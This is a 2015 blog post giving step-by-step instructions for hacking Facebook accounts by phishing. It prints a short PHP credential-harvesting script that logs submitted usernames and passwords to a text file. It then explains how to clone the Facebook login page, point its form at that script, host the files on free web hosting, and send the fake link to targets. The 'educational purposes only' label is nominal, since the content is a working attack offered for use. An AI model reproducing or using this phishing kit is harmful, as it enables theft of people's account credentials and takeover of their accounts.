Sunday, 18 January 2015

How To Hack Facebook Using Phishing Method 2015


(Use for educational purposes only)

  1. Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

How will this be done? You will be able to gain access to another users facebook profile by using a method known as "phishing" 


What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one. 

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

If you want to know more about phishing attacks then you should read this article from our sister website: What Is Phishing Scams Or Attacks And How to Prevent It

STEP 1:Creating Phishing.php file :

1. Even if you don't have any knowledge of php file simply copy the following script and save it as phishing.php .

$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");

STEP 2: Creating index.html page :

1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it a

2. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .

3. search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get .

4. save index.html

STEP 3: Now create a completely blank text file with name passwords.txt.

Now you have all the following three files with you :
1. phishing.php
2. index.html
3. passwords.txt

Step 4: Now you need to make a website.

Dreamhost banner

I recommended you byethost because it is completely free hosting with free domain.

Go to:  and fill out the informations needed and click on register button.

2. Now Goto your email account that you gave and confirm your account with confirmation link.
(Note the cpanel username that you got when verified with your activation link)

3. Now Go to  and Log into your account Cpanel.
Enter your cpanel username and password and login

4. Now when you are logged into your account then Go to File Manager under Files and log into it.

5. Now Click on the Public_html.

6 .Click on the Upload button and upload 3 files named phishing.php, index.html and passwords.txt 
(before uploading files you need to delete all the files inside  the Public_html folder)

7. After successfully uploaded 3 files click on index.html file, then your fake phishing page will open up.

You are now ready to phishing.

sent your fake login page's URL to someone via email or chatting  , when someone type their facebook email and password in your fake login page it will store to your passwords.tex file. 

The Input Data (Email and Password) will look like this.

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